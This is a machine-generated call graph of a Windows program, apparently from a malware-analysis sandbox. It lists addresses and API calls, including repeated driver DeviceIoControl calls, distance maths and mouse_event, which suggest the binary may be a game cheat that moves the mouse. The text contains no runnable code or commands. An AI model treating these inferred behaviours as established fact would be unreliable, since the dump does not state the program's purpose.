10285->9917 10286->10283 10287->10283 10289 7ff62c0c16d9 10288->10289 10292 7ff62c0c131c 10288->10292 10290 7ff62c0cf650 8 API calls 10289->10290 10291 7ff62c0c173d 10290->10291 10291->9925 10292->10289 10310 7ff62c0bb430 10292->10310 10311 7ff62c0bb47f 10310->10311 10312 7ff62c0bb452 10310->10312 10313 7ff62c0b2200 3 API calls 10312->10313 10313->10311 10375 7ff62c0bdf40 10314->10375 10318 7ff62c0b2794 10319 7ff62c0b27cb 10318->10319 10320 7ff62c0b27b7 free 10318->10320 10321 7ff62c0b27f3 10319->10321 10322 7ff62c0b27e6 free 10319->10322 10320->10319 10323 7ff62c0b281b 10321->10323 10325 7ff62c0b280e free 10321->10325 10322->10321 10327 7ff62c0a67ac free 10323->10327 10329 7ff62c0b2836 free 10323->10329 10325->10323 10326 7ff62c0b274a 10326->10318 10328 7ff62c0b277a free 10326->10328 10389 7ff62c0c01e0 10326->10389 10327->9680 10328->10326 10329->10327 10331 7ff62c0b15a4 10330->10331 10338 7ff62c0b1695 10330->10338 10332 7ff62c0b15da 10331->10332 10333 7ff62c0b24b0 3 API calls 10331->10333 10334 7ff62c0b24b0 3 API calls 10332->10334 10336 7ff62c0b15ee 10332->10336 10333->10332 10334->10336 10398 7ff62c0a2fb0 10336->10398 10338->9696 10339 7ff62c0b1678 fwrite fclose 10339->10338 10341 7ff62c0b288a free 10340->10341 10345 7ff62c0b28a8 10340->10345 10341->10345 10343 7ff62c0b28fe 10406 7ff62c0a1a20 10343->10406 10345->10343 10347 7ff62c0b28e3 free 10345->10347 10347->10345 10348 7ff62c0b2936 10349 7ff62c0b2961 10348->10349 10351 7ff62c0b2954 free 10348->10351 10352 7ff62c0b298c 10349->10352 10353 7ff62c0b297f free 10349->10353 10350 7ff62c0b2929 free 10350->10348 10351->10349 10423 7ff62c0a4750 10352->10423 10353->10352 10357 7ff62c0bae51 10356->10357 10358 7ff62c0bae2c free 10356->10358 10360 7ff62c0bae80 10357->10360 10361 7ff62c0bae70 free 10357->10361 10358->10357 10362 7ff62c0baeaf 10360->10362 10364 7ff62c0bae9f free 10360->10364 10361->10360 10363 7ff62c0baeea 10362->10363 10365 7ff62c0baeda free 10362->10365 10366 7ff62c0baf19 10363->10366 10367 7ff62c0baf09 free 10363->10367 10364->10362 10365->10363 10368 7ff62c0baf3e free 10366->10368 10374 7ff62c0baf51 10366->10374 10367->10366 10368->10374 10369 7ff62c0bb023 10370 7ff62c0a6b33 10369->10370 10371 7ff62c0bb05c free 10369->10371 10370->9713 10370->9714 10371->10370 10372 7ff62c0bafc8 free 10372->10374 10373 7ff62c0bb001 free 10373->10374 10374->10369 10374->10372 10374->10373 10377 7ff62c0bdfb8 10375->10377 10380 7ff62c0bdf60 10375->10380 10376 7ff62c0be049 10379 7ff62c0b2742 10376->10379 10381 7ff62c0be068 free 10376->10381 10377->10376 10378 7ff62c0be039 free 10377->10378 10378->10376 10383 7ff62c0be0a0 10379->10383 10380->10377 10382 7ff62c0bdf96 free 10380->10382 10381->10379 10382->10380 10384 7ff62c0be0d0 10383->10384 10385 7ff62c0be0b2 free 10383->10385 10387 7ff62c0be0f7 10384->10387 10388 7ff62c0be0eb free 10384->10388 10385->10384 10387->10326 10388->10387 10390 7ff62c0c0270 3 API calls 10389->10390 10391 7ff62c0c01ee 10390->10391 10392 7ff62c0c020a free 10391->10392 10395 7ff62c0c0217 10391->10395 10392->10395 10393 7ff62c0c0267 10393->10326 10394 7ff62c0c0232 free 10396 7ff62c0c023f 10394->10396 10395->10394 10395->10396 10396->10393 10397 7ff62c0c025a free 10396->10397 10397->10393 10399 7ff62c0a2fda 10398->10399 10400 7ff62c0b2680 3 API calls 10399->10400 10401 7ff62c0a3073 10399->10401 10400->10401 10402 7ff62c0a3099 _wfopen 10401->10402 10403 7ff62c0a30d4 10402->10403 10404 7ff62c0a30ad free 10402->10404 10403->10338 10403->10339 10404->10403 10407 7ff62c0bae10 9 API calls 10406->10407 10408 7ff62c0a1a2e 10407->10408 10409 7ff62c0a1a5a 10408->10409 10410 7ff62c0a1a4d free 10408->10410 10411 7ff62c0a1a85 10409->10411 10412 7ff62c0a1a78 free 10409->10412 10410->10409 10413 7ff62c0a1aad 10411->10413 10414 7ff62c0a1aa0 free 10411->10414 10412->10411 10415 7ff62c0a1ac8 free 10413->10415 10418 7ff62c0a1ad5 10413->10418 10414->10413 10415->10418 10416 7ff62c0a1afd 10419 7ff62c0a1b25 10416->10419 10420 7ff62c0a1b18 free 10416->10420 10417 7ff62c0a1af0 free 10417->10416 10418->10416 10418->10417 10421 7ff62c0a1b4d 10419->10421 10422 7ff62c0a1b40 free 10419->10422 10420->10419 10421->10348 10421->10350 10422->10421 10424 7ff62c0a4765 free 10423->10424 10426 7ff62c0a4784 10423->10426 10424->10426 10427 7ff62c0a47a2 free 10426->10427 10428 7ff62c0a47af 10426->10428 10427->10428 10429 7ff62c0a47da 10428->10429 10430 7ff62c0a47cd free 10428->10430 10431 7ff62c0a4805 10429->10431 10432 7ff62c0a47f8 free 10429->10432 10430->10429 10433 7ff62c0a4830 10431->10433 10434 7ff62c0a4823 free 10431->10434 10432->10431 10433->9696 10434->10433 10436 7ff62c0a25c1 10435->10436 10437 7ff62c0a25a2 free 10435->10437 10438 7ff62c0a25e9 10436->10438 10440 7ff62c0a25dc free 10436->10440 10437->10436 10441 7ff62c0a2611 10438->10441 10442 7ff62c0a2604 free 10438->10442 10440->10438 10441->9748 10441->9749 10442->10441 10444 7ff62c0b1eae 10443->10444 10452 7ff62c0b1e58 10443->10452 10445 7ff62c0b1edd 10444->10445 10447 7ff62c0b1ecd free 10444->10447 10446 7ff62c0b1f0b 10445->10446 10448 7ff62c0b1efb free 10445->10448 10449 7ff62c0b1f36 10446->10449 10450 7ff62c0b1f29 free 10446->10450 10447->10445 10448->10446 10451 7ff62c0b1f5e 10449->10451 10454 7ff62c0b1f51 free 10449->10454 10450->10449 10451->9754 10451->9755 10452->10444 10453 7ff62c0b1e95 free 10452->10453 10453->10452 10454->10451 10458 7ff62c0be15f 10455->10458 10459 7ff62c0be30e 10455->10459 10456 7ff62c0be2cb 10456->10459 10461 7ff62c0be2f3 malloc 10456->10461 10457 7ff62c0be2bc 10472 7ff62c0bea90 10457->10472 10458->10456 10458->10457 10465 7ff62c0be8f0 10458->10465 10462 7ff62c0cf650 8 API calls 10459->10462 10461->10459 10464 7ff62c0be38a 10462->10464 10464->9787 10464->9788 10466 7ff62c0be920 malloc 10465->10466 10468 7ff62c0be973 10466->10468 10524 7ff62c0be5f0 10468->10524 10473 7ff62c0beae6 10472->10473 10474 7ff62c0beb21 10472->10474 10572 7ff62c0c1e20 10473->10572 10475 7ff62c0be0a0 2 API calls 10474->10475 10480 7ff62c0beb43 malloc 10475->10480 10478 7ff62c0bec37 10479 7ff62c0bec3d malloc 10478->10479 10484 7ff62c0bec60 10479->10484 10496 7ff62c0bf225 10479->10496 10480->10478 10480->10479 10481 7ff62c0bfb82 10483 7ff62c0cf650 8 API calls 10481->10483 10482 7ff62c0bfbb7 free 10482->10481 10485 7ff62c0bfbd4 10483->10485 10484->10496 10579 7ff62c0bfc00 10484->10579 10485->10456 10489 7ff62c0bed5d malloc 10491 7ff62c0bedb4 10489->10491 10492 7ff62c0bedba malloc 10489->10492 10491->10492 10494 7ff62c0bede3 malloc memset memset memset 10492->10494 10495 7ff62c0beddd 10492->10495 10493 7ff62c0bed05 10493->10489 10493->10496 10498 7ff62c0bf2b3 malloc memset 10494->10498 10516 7ff62c0bee43 10494->10516 10495->10494 10496->10481 10496->10482 10502 7ff62c0bf519 free 10498->10502 10517 7ff62c0bf380 10498->10517 10503 7ff62c0bf565 free 10502->10503 10504 7ff62c0bf553 10502->10504 10506 7ff62c0bf58f free 10503->10506 10507 7ff62c0bf57d 10503->10507 10504->10503 10508 7ff62c0bf97e free 10506->10508 10522 7ff62c0bf5c5 10506->10522 10507->10506 10510 7ff62c0bf9ed free 10508->10510 10511 7ff62c0bf9db 10508->10511 10513 7ff62c0bfa14 free 10510->10513 10514 7ff62c0bfa02 10510->10514 10511->10510 10518 7ff62c0bfa28 10513->10518 10514->10513 10515 7ff62c0c0270 3 API calls 10515->10522 10516->10498 10588 7ff62c0b99d0 10516->10588 10593 7ff62c0b3290 10516->10593 10517->10502 10600 7ff62c0b9dd0 10517->10600 10519 7ff62c0bfb33 10518->10519 10520 7ff62c0c0700 3 API calls 10518->10520 10519->10481 10521 7ff62c0c0340 11 API calls 10519->10521 10520->10518 10521->10519 10522->10508 10522->10515 10607 7ff62c0c0340 10522->10607 10617 7ff62c0c0700 10522->10617 10525 7ff62c0be67f malloc 10524->10525 10526 7ff62c0be679 10524->10526 10527 7ff62c0be6bb 10525->10527 10531 7ff62c0be759 10525->10531 10526->10525 10527->10531 10536 7ff62c0c1760 10527->10536 10548 7ff62c0be3a0 10531->10548 10532 7ff62c0cf650 8 API calls 10533 7ff62c0be8bf free 10532->10533 10533->10457 10534 7ff62c0be738 10534->10531 10535 7ff62c0c1760 3 API calls 10534->10535 10535->10534 10537 7ff62c0c192e 10536->10537 10539 7ff62c0c1779 10536->10539 10538 7ff62c0c1937 10537->10538 10540 7ff62c0c1ab4 10537->10540 10541 7ff62c0c1b2c 10537->10541 10538->10534 10542 7ff62c0c1786 10539->10542 10543 7ff62c0c1907 memcpy 10539->10543 10544 7ff62c0c1af1 10540->10544 10545 7ff62c0c1af7 memcpy 10540->10545 10546 7ff62c0c1b6e memcpy 10541->10546 10547 7ff62c0c1b68 10541->10547 10542->10534 10542->10542 10543->10542 10544->10534 10545->10544 10546->10547 10547->10534 10547->10547 10549 7ff62c0be3bf malloc 10548->10549 10559 7ff62c0be44d 10548->10559 10551 7ff62c0be400 10549->10551 10552 7ff62c0be435 10549->10552 10553 7ff62c0c0270 3 API calls 10551->10553 10565 7ff62c0b22b0 10552->10565 10553->10552 10554 7ff62c0be5ce 10558 7ff62c0be0a0 2 API calls 10554->10558 10556 7ff62c0be4e8 10556->10554 10557 7ff62c0be5ac malloc memcpy 10556->10557 10557->10554 10560 7ff62c0be5d6 10558->10560 10559->10556 10561 7ff62c0be48c malloc 10559->10561 10560->10532 10561->10556 10562 7ff62c0be4ae memcpy 10561->10562 10563 7ff62c0be4dc free 10562->10563 10564 7ff62c0be4ca 10562->10564 10563->10556 10564->10563 10566 7ff62c0b235e 10565->10566 10567 7ff62c0b22d3 10565->10567 10566->10559 10567->10566 10568 7ff62c0b2309 malloc 10567->10568 10568->10566 10569 7ff62c0b2328 memcpy 10568->10569 10570 7ff62c0b2340 10569->10570 10571 7ff62c0b2352 free 10569->10571 10570->10571 10571->10566 10573 7ff62c0c1e42 10572->10573 10576 7ff62c0c1ecd 10572->10576 10574 7ff62c0c1e78 malloc 10573->10574 10573->10576 10575 7ff62c0c1e97 memcpy 10574->10575 10574->10576 10577 7ff62c0c1ec1 free 10575->10577 10578 7ff62c0c1eaf 10575->10578 10576->10474 10577->10576 10578->10577 10580 7ff62c0bfc35 10579->10580 10581 7ff62c0bfc6d memset 10579->10581 10580->10581 10582 7ff62c0bfc57 malloc 10580->10582 10583 7ff62c0bfc87 10581->10583 10582->10581 10583->10583 10584 7ff62c0b3290 3 API calls 10583->10584 10586 7ff62c0bfcca 10584->10586 10585 7ff62c0becc6 malloc 10585->10489 10585->10493 10586->10585 10587 7ff62c0bfd2c free 10586->10587 10587->10585 10589 7ff62c0b9d6a 10588->10589 10591 7ff62c0b9a02 10588->10591 10589->10516 10591->10589 10592 7ff62c0b9c57 floorf floorf ceilf ceilf 10591->10592 10620 7ff62c0b5f70 10591->10620 10592->10591 10594 7ff62c0b32cf qsort 10593->10594 10595 7ff62c0b32bd 10593->10595 10596 7ff62c0b34ca qsort 10594->10596 10599 7ff62c0b32f4 10594->10599 10595->10594 10596->10516 10597 7ff62c0b3456 qsort 10598 7ff62c0b3480 10597->10598 10598->10516 10599->10597 10601 7ff62c0ba2d4 10600->10601 10604 7ff62c0b9e18 10600->10604 10601->10517 10604->10601 10624 7ff62c0b72e0 10604->10624 10636 7ff62c0b9170 10604->10636 10652 7ff62c0b9480 10604->10652 10658 7ff62c0b9730 10604->10658 10608 7ff62c0c0366 10607->10608 10609 7ff62c0c03b3 10608->10609 10610 7ff62c0c03a3 free 10608->10610 10611 7ff62c0c03e2 10609->10611 10612 7ff62c0c03d2 free 10609->10612 10610->10609 10738 7ff62c0c0600 10611->10738 10612->10611 10616 7ff62c0c0487 10616->10522 10618 7ff62c0c1d20 3 API calls 10617->10618 10619 7ff62c0c0733 10618->10619 10619->10522 10623 7ff62c0b6030 10620->10623 10621 7ff62c0cf650 8 API calls 10622 7ff62c0b711f 10621->10622 10622->10591 10623->10621 10625 7ff62c0b730e 10624->10625 10627 7ff62c0b7337 10624->10627 10626 7ff62c0b5f70 8 API calls 10625->10626 10626->10627 10628 7ff62c0b74a5 10627->10628 10629 7ff62c0b73f0 floorf 10627->10629 10630 7ff62c0b7411 10627->10630 10628->10604 10629->10630 10631 7ff62c0b7445 10630->10631 10632 7ff62c0b7427 floorf 10630->10632 10633 7ff62c0b747a 10631->10633 10634 7ff62c0b745a ceilf 10631->10634 10632->10631 10633->10628 10635 7ff62c0b7487 ceilf 10633->10635 10634->10633 10635->10628 10664 7ff62c0b71f0 10636->10664 10639 7ff62c0b923c 10641 7ff62c0b92a3 floorf floorf 10639->10641 10644 7ff62c0b92e4 10639->10644 10640 7ff62c0b5f70 8 API calls 10640->10639 10641->10644 10642 7ff62c0b9405 free 10642->10604 10644->10642 10673 7ff62c0b8d70 10644->10673 10650 7ff62c0b93f0 10651 7ff62c0b93f6 free 10650->10651 10651->10642 10653 7ff62c0b971f 10652->10653 10656 7ff62c0b9489 10652->10656 10653->10604 10654 7ff62c0b94e0 memset 10654->10656 10655 7ff62c0b9703 10657 7ff62c0cf650 8 API calls 10655->10657 10656->10654 10656->10655 10657->10653 10659 7ff62c0b99b9 10658->10659 10662 7ff62c0b9738 10658->10662 10659->10604 10660 7ff62c0b9780 memset 10660->10662 10661 7ff62c0b99a2 10663 7ff62c0cf650 8 API calls 10661->10663 10662->10660 10662->10661 10663->10659 10665 7ff62c0b7210 10664->10665 10666 7ff62c0b721a 10664->10666 10693 7ff62c0b4d50 10665->10693 10668 7ff62c0b5f70 8 API calls 10666->10668 10670 7ff62c0b7268 10668->10670 10669 7ff62c0b7215 10669->10639 10669->10640 10670->10669 10671 7ff62c0b7287 malloc 10670->10671 10672 7ff62c0b5f70 8 API calls 10671->10672 10672->10669 10674 7ff62c0b8dbf 10673->10674 10675 7ff62c0b8e0b malloc 10674->10675 10679 7ff62c0b8e27 10674->10679 10676 7ff62c0b8e32 10675->10676 10675->10679 10677 7ff62c0b8e78 malloc 10676->10677 10676->10679 10711 7ff62c0b88d0 10676->10711 10677->10676 10678 7ff62c0b911f free 10677->10678 10680 7ff62c0b9148 free 10678->10680 10681 7ff62c0b9136 10678->10681 10679->10642 10683 7ff62c0b8340 10679->10683 10680->10679 10681->10680 10684 7ff62c0b8391 malloc 10683->10684 10686 7ff62c0b86be 10684->10686 10689 7ff62c0b8479 10684->10689 10687 7ff62c0cf650 8 API calls 10686->10687 10688 7ff62c0b86cb free 10687->10688 10688->10650 10688->10651 10725 7ff62c0b7c80 10689->10725 10694 7ff62c0b4dc8 10693->10694 10695 7ff62c0b4e02 malloc 10694->10695 10708 7ff62c0b4e99 10694->10708 10710 7ff62c0b51fe 10694->10710 10695->10708 10697 7ff62c0b5405 sqrtf 10697->10710 10698 7ff62c0b5438 sqrtf 10698->10710 10699 7ff62c0b71f0 9 API calls 10699->10710 10700 7ff62c0b58d2 malloc 10701 7ff62c0b599b 10700->10701 10700->10710 10702 7ff62c0b59c1 10701->10702 10705 7ff62c0b59b2 free 10701->10705 10706 7ff62c0b59e0 free 10702->10706 10702->10708 10703 7ff62c0b590c memcpy 10703->10710 10704 7ff62c0b58fd memcpy 10704->10703 10705->10702 10706->10708 10707 7ff62c0b593b free 10707->10710 10708->10669 10709 7ff62c0b596c free 10709->10710 10710->10697 10710->10698 10710->10699 10710->10700 10710->10703 10710->10704 10710->10707 10710->10708 10710->10709 10712 7ff62c0b89bf sqrtf 10711->10712 10713 7ff62c0b89b6 10711->10713 10712->10713 10714 7ff62c0b89e2 10713->10714 10715 7ff62c0b89ec sqrtf 10713->10715 10716 7ff62c0b8a11 10714->10716 10717 7ff62c0b8a1b sqrtf 10714->10717 10715->10714 10718 7ff62c0b8a3e 10716->10718 10719 7ff62c0b8a47 sqrtf 10716->10719 10717->10716 10720 7ff62c0b8cf3 10718->10720 10721 7ff62c0b8c45 sqrtf 10718->10721 10722 7ff62c0b8c72 sqrtf 10718->10722 10723 7ff62c0b8ca1 sqrtf 10718->10723 10724 7ff62c0b8ccd sqrtf 10718->10724 10719->10718 10720->10676 10721->10718 10722->10718 10723->10718 10724->10718 10726 7ff62c0b7ce5 malloc 10725->10726 10737 7ff62c0b7d16 10725->10737 10726->10737 10728 7ff62c0b7dd6 memset memset 10728->10737 10729 7ff62c0b804f 10731 7ff62c0b80e5 free 10729->10731 10734 7ff62c0b80fc 10729->10734 10730 7ff62c0b813c 10733 7ff62c0cf650 8 API calls 10730->10733 10731->10729 10731->10734 10732 7ff62c0b812d free 10732->10730 10735 7ff62c0b814c free 10733->10735 10734->10730 10734->10732 10735->10686 10736 7ff62c0b7e8f malloc 10736->10737 10737->10728 10737->10729 10737->10736 10739 7ff62c0c0616 10738->10739 10741 7ff62c0c03f2 10738->10741 10740 7ff62c0c0663 10739->10740 10753 7ff62c0b2540 10739->10753 10740->10741 10743 7ff62c0b2680 3 API calls 10740->10743 10741->10616 10744 7ff62c0c1d20 10741->10744 10743->10741 10745 7ff62c0c1e06 10744->10745 10746 7ff62c0c1d3a 10744->10746 10745->10616 10747 7ff62c0c1df4 10746->10747 10748 7ff62c0c1d79 malloc 10746->10748 10747->10616 10749 7ff62c0c1dd6 10748->10749 10750 7ff62c0c1d9c memcpy 10748->10750 10749->10616 10751 7ff62c0c1db8 10750->10751 10752 7ff62c0c1dca free 10750->10752 10751->10752 10752->10749 10754 7ff62c0b2555 malloc 10753->10754 10756 7ff62c0b25c1 10753->10756 10754->10756 10757 7ff62c0b258b memcpy 10754->10757 10756->10740 10758 7ff62c0b25b5 free 10757->10758 10759 7ff62c0b25a3 10757->10759 10758->10756 10759->10758 10761 7ff62c0d006e RtlLookupFunctionEntry 10760->10761 10762 7ff62c0d0084 RtlVirtualUnwind 10761->10762 10763 7ff62c0cffab 10761->10763 10762->10761 10762->10763 10764 7ff62c0cff4c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10763->10764 10779 7ff62c0cff38 10782 7ff62c0d04f0 10779->10782 10783 7ff62c0d0513 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10782->10783 10784 7ff62c0cff41 10782->10784 10783->10784 10785 7ff62c0c7570 10786 7ff62c0c75b0 8 API calls 10785->10786 10787 7ff62c0c799f DeviceIoControl DeviceIoControl DeviceIoControl 10786->10787 10788 7ff62c0c793a DeviceIoControl 10786->10788 10792 7ff62c0c7af2 10787->10792 10788->10787 10789 7ff62c0c7b00 DeviceIoControl DeviceIoControl 10791 7ff62c0c7be9 DeviceIoControl 10789->10791 10789->10792 10791->10792 10792->10789 10792->10791 10797 7ff62c0cef30 10792->10797 10812 7ff62c0cf450 10792->10812 10798 7ff62c0cef9e 10797->10798 10799 7ff62c0cf0dd 10797->10799 10834 7ff62c0cf2a0 10798->10834 10845 7ff62c0cf280 ?_Xlength_error@std@@YAXPEBD 10799->10845 10803 7ff62c0ceff0 10804 7ff62c0cf023 memcpy 10803->10804 10805 7ff62c0cf01e 10803->10805 10806 7ff62c0cf03c memcpy 10804->10806 10805->10806 10807 7ff62c0cf09c 10806->10807 10808 7ff62c0cf049 10806->10808 10807->10792 10809 7ff62c0cf091 10808->10809 10810 7ff62c0cf0d6 _invalid_parameter_noinfo_noreturn 10808->10810 10811 7ff62c0cfbf8 free 10809->10811 10810->10799 10811->10807 10813 7ff62c0cf58e 10812->10813 10814 7ff62c0cf4c9 10812->10814 10815 7ff62c0cf5b4 memcpy memcpy 10813->10815 10816 7ff62c0cf5fe memcpy 10813->10816 10817 7ff62c0cf637 10814->10817 10821 7ff62c0cf4dc 10814->10821 10818 7ff62c0c7cd4 Sleep 10815->10818 10816->10818 10846 7ff62c0cf280 ?_Xlength_error@std@@YAXPEBD 10817->10846 10828 7ff62c0ce9b0 10818->10828 10822 7ff62c0cf523 10821->10822 10824 7ff62c0cf587 _invalid_parameter_noinfo_noreturn 10821->10824 10827 7ff62c0cf52e 10821->10827 10825 7ff62c0cfbf8 free 10822->10825 10823 7ff62c0cf2a0 5 API calls 10826 7ff62c0cf54c memcpy 10823->10826 10824->10813 10825->10827 10826->10818 10827->10823 10829 7ff62c0ce9c1 10828->10829 10833 7ff62c0c7ce9 10828->10833 10830 7ff62c0cea24 _invalid_parameter_noinfo_noreturn 10829->10830 10831 7ff62c0cea09 10829->10831 10832 7ff62c0cfbf8 free 10831->10832 10832->10833 10833->10786 10835 7ff62c0cf2b3 10834->10835 10836 7ff62c0cf30e 10834->10836 10835->10836 10837 7ff62c0cf2f9 10835->10837 10840 7ff62c0cf2d1 10835->10840 10838 7ff62c0c6050 Concurrency::cancel_current_task __std_exception_copy 10836->10838 10837->10803 10839 7ff62c0cf313 10838->10839 10841 7ff62c0cfc70 4 API calls 10840->10841 10842 7ff62c0cf2d9 10841->10842 10843 7ff62c0cf2f2 _invalid_parameter_noinfo_noreturn 10842->10843 10844 7ff62c0cf2e1 10842->10844 10843->10837 10844->10803 10973 7ff62c0c7ff0 10992 7ff62c0cebd0 DeviceIoControl 10973->10992 10975 7ff62c0c8028 10993 7ff62c0c6e10 10975->10993 10977 7ff62c0c803d 10978 7ff62c0c81f4 10977->10978 10979 7ff62c0c804a powf powf powf 10977->10979 10980 7ff62c0c6f70 10 API calls 10978->10980 10981 7ff62c0c80ae 10979->10981 10982 7ff62c0c80b7 sqrtf 10979->10982 10990 7ff62c0c81ce 10980->10990 11002 7ff62c0cebd0 DeviceIoControl 10981->11002 10982->10981 10983 7ff62c0c8240 pow pow 10986 7ff62c0c82a4 10983->10986 10987 7ff62c0c82ad sqrt 10983->10987 10985 7ff62c0c80ce DeviceIoControl 11003 7ff62c0c6f70 10985->11003 10989 7ff62c0c8365 10986->10989 10991 7ff62c0bd670 23 API calls 10986->10991 10987->10986 10990->10983 10990->10989 10991->10989 10992->10975 11021 7ff62c0cebd0 DeviceIoControl 10993->11021 10995 7ff62c0c6e4f 10996 7ff62c0c6e63 10995->10996 11022 7ff62c0cebd0 DeviceIoControl 10995->11022 11023 7ff62c0cec50 DeviceIoControl 10996->11023 11000 7ff62c0cec50 9 API calls 11001 7ff62c0c6e8e 11000->11001 11001->10977 11002->10985 11026 7ff62c0cebd0 DeviceIoControl 11003->11026 11005 7ff62c0c6fe2 11027 7ff62c0cebd0 DeviceIoControl 11005->11027 11007 7ff62c0c6feb 11028 7ff62c0ced30 DeviceIoControl 11007->11028 11009 7ff62c0c6ffa 11029 7ff62c0ced30 DeviceIoControl 11009->11029 11011 7ff62c0c7010 11012 7ff62c0c705c 6 API calls 11011->11012 11030 7ff62c0cebd0 DeviceIoControl 11012->11030 11014 7ff62c0c7105 11031 7ff62c0cebd0 DeviceIoControl 11014->11031 11016 7ff62c0c7111 11032 7ff62c0cebd0 DeviceIoControl 11016->11032 11018 7ff62c0c711d DeviceIoControl 11033 7ff62c0ced30 DeviceIoControl 11018->11033 11020 7ff62c0c71fe tanf 11020->10990 11021->10995 11022->10996 11024 7ff62c0cf650 8 API calls 11023->11024 11025 7ff62c0c6e7d 11024->11025 11025->11000 11026->11005 11027->11007 11028->11009 11029->11011 11030->11014 11031->11016 11032->11018 11033->11020 11313 7ff62c0bdaf0 11316 7ff62c0bdb19 11313->11316 11323 7ff62c0bdc3d 11313->11323 11314 7ff62c0bdba1 11315 7ff62c0bdbe0 11314->11315 11321 7ff62c0b2200 3 API calls 11314->11321 11318 7ff62c0bb930 20 API calls 11315->11318 11317 7ff62c0bdb5f 11316->11317 11319 7ff62c0b2200 3 API calls 11316->11319 11317->11314 11320 7ff62c0b2200 3 API calls 11317->11320 11322 7ff62c0bdc19 11318->11322 11319->11317 11320->11314 11321->11315 11322->11323 11324 7ff62c0b2200 3 API calls 11322->11324 11324->11323 11325 7ff62c0c7cf0 11343 7ff62c0cebd0 DeviceIoControl 11325->11343 11327 7ff62c0c7d24 11328 7ff62c0c6e10 10 API calls 11327->11328 11329 7ff62c0c7d39 11328->11329 11330 7ff62c0c7ef0 11329->11330 11331 7ff62c0c7d46 powf powf powf 11329->11331 11334 7ff62c0c6f70 10 API calls 11330->11334 11332 7ff62c0c7db3 sqrtf 11331->11332 11333 7ff62c0c7daa 11331->11333 11332->11333 11344 7ff62c0cebd0 DeviceIoControl 11333->11344 11340 7ff62c0c7eca 11334->11340 11336 7ff62c0c7f3c pow pow 11339 7ff62c0c7f9c 11336->11339 11337 7ff62c0c7dca DeviceIoControl 11338 7ff62c0c6f70 10 API calls 11337->11338 11338->11340 11341 7ff62c0c7fcb 11339->11341 11345 7ff62c0c73e0 11339->11345 11340->11336 11340->11341 11343->11327 11344->11337 11349 7ff62c0c7436 mouse_event 11345->11349 11347 7ff62c0c7520 mouse_event mouse_event 11348 7ff62c0c755a 11347->11348 11348->11341 11349->11347 11349->11348 11226 7ff62c0cf670 InitializeCriticalSectionAndSpinCount GetModuleHandleW 11227 7ff62c0cf6a1 GetModuleHandleW 11226->11227 11228 7ff62c0cf6b6 GetProcAddress GetProcAddress 11226->11228 11227->11228 11237 7ff62c0cf718 11227->11237 11229 7ff62c0cf6f3 CreateEventW 11228->11229 11230 7ff62c0cf6de 11228->11230 11232 7ff62c0cf6e3 11229->11232 11229->11237 11230->11229 11230->11232 11231 7ff62c0d00d0 9 API calls 11233 7ff62c0cf73f DeleteCriticalSection 11231->11233 11239 7ff62c0cfa30 11232->11239 11235 7ff62c0cf763 11233->11235 11236 7ff62c0cf75d CloseHandle 11233->11236 11236->11235 11237->11231 11238 7ff62c0cf71c 11237->11238 11240 7ff62c0cfa41 11239->11240 11241 7ff62c0cfa73 11239->11241 11242 7ff62c0cfab0 11240->11242 11245 7ff62c0cfa46 __scrt_release_startup_lock 11240->11245 11241->11237 11243 7ff62c0d00d0 9 API calls 11242->11243 11244 7ff62c0cfaba 11243->11244 11245->11241 11246 7ff62c0cfa63 _initialize_onexit_table 11245->11246 11246->11241 11247 7ff62c0ce070 11248 7ff62c0ce084 11247->11248 11249 7ff62c0ce158 exit 11247->11249 11250 7ff62c0ce090 GetWindowRect GetWindowLongA 11248->11250 11251 7ff62c0ce107 MoveWindow 11248->11251 11250->11248 11250->11251 11251->11249 11251->11250 11350 7ff62c0cfeea 11351 7ff62c0d0228 GetModuleHandleW 11350->11351 11352 7ff62c0cfef1 11351->11352 11353 7ff62c0cfef5 11352->11353 11354 7ff62c0cff30 _exit 11352->11354 10847 7ff62c0d1169 10848 7ff62c0cfbf8 free 10847->10848 10849 7ff62c0d1171 10848->10849 11358 7ff62c0cfcd8 11359 7ff62c0cfce8 11358->11359 11360 7ff62c0cfa30 10 API calls 11359->11360 11361 7ff62c0cfd0c _RTC_Initialize 11360->11361 11369 7ff62c0cfd6f 11361->11369 11371 7ff62c0d05a4 InitializeSListHead 11361->11371 11362 7ff62c0d00d0 9 API calls 11363 7ff62c0cfd8d 11362->11363 11369->11362 11370 7ff62c0cfd7d 11369->11370 11040 7ff62c0a8c10 11041 7ff62c0a8c4b 11040->11041 11043 7ff62c0a9372 11040->11043 11041->11043 11048 7ff62c0ac8f0 11041->11048 11044 7ff62c0c3850 3 API calls 11047 7ff62c0a8d68 11044->11047 11045 7ff62c0c3850 3 API calls 11046 7ff62c0a910f 11045->11046 11046->11043 11046->11045 11047->11044 11047->11046 11050 7ff62c0ac929 11048->11050 11049 7ff62c0ac95e 11049->11047 11050->11049 11051 7ff62c0b2540 3 API calls 11050->11051 11051->11049 11052 7ff62c0b1810 11053 7ff62c0b1915 11052->11053 11057 7ff62c0b1847 11052->11057 11054 7ff62c0b24b0 3 API calls 11053->11054 11058 7ff62c0b193a 11054->11058 11056 7ff62c0b1a1a 11057->11053 11062 7ff62c0b11a0 11057->11062 11058->11056 11059 7ff62c0b1979 strstr 11058->11059 11061 7ff62c0a3690 __stdio_common_vsprintf __stdio_common_vsprintf malloc memcpy free 11058->11061 11071 7ff62c0a3690 11059->11071 11061->11058 11063 7ff62c0b127e malloc memcpy 11062->11063 11065 7ff62c0b11eb 11062->11065 11066 7ff62c0b1327 11063->11066 11065->11063 11067 7ff62c0b121f malloc 11065->11067 11066->11057 11067->11063 11068 7ff62c0b1241 memcpy 11067->11068 11069 7ff62c0b1272 free 11068->11069 11070 7ff62c0b1260 11068->11070 11069->11063 11070->11069 11072 7ff62c0a35a0 5 API calls 11071->11072 11073 7ff62c0a36ad 11072->11073 11073->11058 10857 7ff62c0a6f90 10858 7ff62c0bb300 3 API calls 10857->10858 10859 7ff62c0a6fc5 10858->10859 11376 7ff62c0a1510 11377 7ff62c0a1534 11376->11377 11378 7ff62c0a157d 11376->11378 11380 7ff62c0cf320 6 API calls 11377->11380 11426 7ff62c0c60f0 ?_Xlength_error@std@@YAXPEBD 11378->11426 11380->11378 11078 7ff62c0d1010 11079 7ff62c0d1051 11078->11079 11080 7ff62c0d1021 11078->11080 11081 7ff62c0d1049 11080->11081 11082 7ff62c0d1073 _invalid_parameter_noinfo_noreturn 11080->11082 11083 7ff62c0cfbf8 free 11081->11083 11084 7ff62c0d10c1 